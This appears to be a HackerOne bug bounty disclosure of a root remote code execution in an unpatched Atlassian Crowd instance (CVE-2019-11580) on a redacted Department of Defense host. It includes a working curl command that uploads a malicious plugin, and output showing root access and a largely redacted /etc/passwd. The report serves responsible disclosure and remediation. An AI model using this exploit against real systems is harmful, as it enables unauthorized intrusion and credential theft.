Lucene search

K
hackeroneCdlH1:632721
HistoryJun 30, 2019 - 3:11 a.m.

U.S. Dept Of Defense: Root Remote Code Execution on https://███

2019-06-3003:11:39
cdl
hackerone.com
62

EPSS

0.974

Percentile

99.9%

Summary:
Atlassian Crowd is a centralized identity management application that allows companies to “Manage users from multiple directories - Active Directory, LDAP, OpenLDAP or Microsoft Azure AD - and control application authentication permissions in one single location.”

A DOD installation is vulnerable to a remote code execution vulnerability due to not patching CVE-2019-11580.

Description:
From Atlassian’s public advisory:

> Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.

There is no public proof-of-concept for this vulnerability, however, I spent a good amount of time reverse-engineering the “pdkinstall” plugin and I was able to successfully construct a working exploit.

Step-by-step Reproduction Instructions

  1. Download and unzip my malicious plugin: rce-plugin.zip {F519371}
  2. cd into the directory
  3. Run the following command:
curl -k -H "Content-Type: multipart/content" \
  --form "[email protected];type=application/octet-stream" https://███/crowd/admin/uploadplugin.action

You’ll see that the malicious plugin is successfully installed:

Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-2906099909159442588rce.jar

Now visit https://███████/crowd/plugins/servlet/hackerone-cdl which invokes my malicious plugin. This executes the command whoami which is the user root

██████████

contents of /etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
████████x:6:0:██████████/sbin:/sbin/shutdown
██████x:7:0:███████/sbin:/sbin/halt
█████████x:8:12:█████/var/spool/████/sbin/nologin
███x:10:14:███/var/spool/███████/sbin/nologin
██████x:11:0:██████/root:/sbin/nologin
██████████x:12:100:███████/usr/████/sbin/nologin
██████████x:13:30:█████/var/█████/sbin/nologin
████x:14:50:FTP User:/var/███████/sbin/nologin
█████████x:99:99:Nobody:/:/sbin/nologin
██████████x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
██████████x:38:38::/etc/██████/sbin/nologin
██████████x:499:76:"Saslauthd user":/var/empty/██████████/sbin/nologin
██████████x:47:47::/var/spool/mqueue:/sbin/nologin
███████x:51:51::/var/spool/mqueue:/sbin/nologin
████████x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
█████x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
████████x:74:74:Privilege-separated SSH:/var/empty/████████/sbin/nologin
████████x:81:81:System message bus:/:/sbin/nologin
███████x:500:500:EC2 Default User:/home/████████/bin/bash

Product, Version, and Configuration (If applicable)

Crowd or Crowd Data Center from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x)
Crowd or Crowd Data Center from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x)
Crowd or Crowd Data Center from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x)
Crowd or Crowd Data Center from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x)
Crowd or Crowd Data Center from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x)

Suggested Mitigation/Remediation Actions

I recommend updating to the latest version of Atlassian Crowd, but if that’s not possible, follow mitigation options in the advisory.

Impact

Remote code execution on https://███. An attacker could exploit this vulnerability to pivot into NIPRNet and gain access to other applications. Since Atlassian Crowd is an Identity management / Single Sign-on application, an attacker could exploit this vulnerability to gain access to any applications using Crowd for sign-ons.

Since this is running as root, an attacker could also easily backdoor the login page and steal credentials.

Thanks,
Corben Leo (@cdl)